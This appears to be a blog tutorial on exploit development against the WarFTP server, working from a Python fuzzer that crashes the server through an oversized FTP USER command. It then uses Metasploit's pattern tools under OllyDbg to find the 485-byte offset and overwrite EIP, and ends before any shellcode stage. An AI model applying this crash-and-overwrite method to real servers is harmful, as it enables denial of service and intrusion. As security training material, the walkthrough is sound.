2. Then make a simple fuzzer using python programming language, save using extension .py save on backtrack.
I saved it on backtrack with name xfuzz.py
fuzzer script :
import socket
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
#buffer = "\x41" * 1000
s. connect (('192.168.43.128' ,21))
data = s. recv (1024)
print ("sending evile data via user comand...")
s. send ('USER '+buffer+'\r\n')
data = s.recv (1024)
s. send ('PASS PASSWORD '+'\r\n')
s. close ()
print ("Finish")
warning : space is very influential in the python language
3. To run WarFTP server chose propertis-start servise, then the status of WarFTP will be idle.
i'll tried to connenct ftp using nc, if succes yo will see like picture below
then i'l tried to run fuzzer on backtrack console,
note the WarFTP, if successfully implemented fuzzer and make the application crash, warftp will disappear from the screen by itself.
every time you make fuzzer to warftp, application will be crash and configuration saved to file FtpDaemon.dat.
to re-run warftp server and prevent errors message then delete file FtpDaemon.dat
4. Re-run warftp server and add user dummies via user security properties.
Then run the Ollydbg to debugging Warftp server.
after adding the new user repeat process fuzzer. On this time the application warftd doesn't dispalyed error message.
Then run application warftp via Ollydbg, re-run fuzzer application.
before fuzzer
after fuzzer
Seen clearly what is happening in the system registry when the crash occurred.
There are 4 registry of affected fuzzer, that is ESP, EDI, EBP, and EIP
5. Pattern create
One of the tools in the metasploit that can be used in conducting vulnerability development is pattern_create.
The purpose is to find out the true locations of a string in the data packets transmitted by the fuzzer into the application
using console go to folder /pentest/exploits/framework/tools
to produce as many as a thousand bytes of data run this command
./pattern_create.rb 1000 > string_pattern.txt
it will saved as string_pattern.txt
open string_pattern.txt and copy the code then add to xfuzz.py as buffer
then run again fuzzer to warftp application, note the register memory warftp server
6. Pattern offset
This function to calculate the amount of bytes from the pattern set generated by the application pattern_create.rb
seen that to achieve the EIP register data needed for 485 byte
add this code to script xfuzz.py
buffer = "\x90" * 485
once more run fuzzer to warftp application, note the register EIP.
we can look that register EIP change to DEADBEEF
TO BE CONTINUE...
How to see the crashed offset value in the server from the client side ...?? so that you can put the value in ./pattern_offset.rb ...??
BalasHapus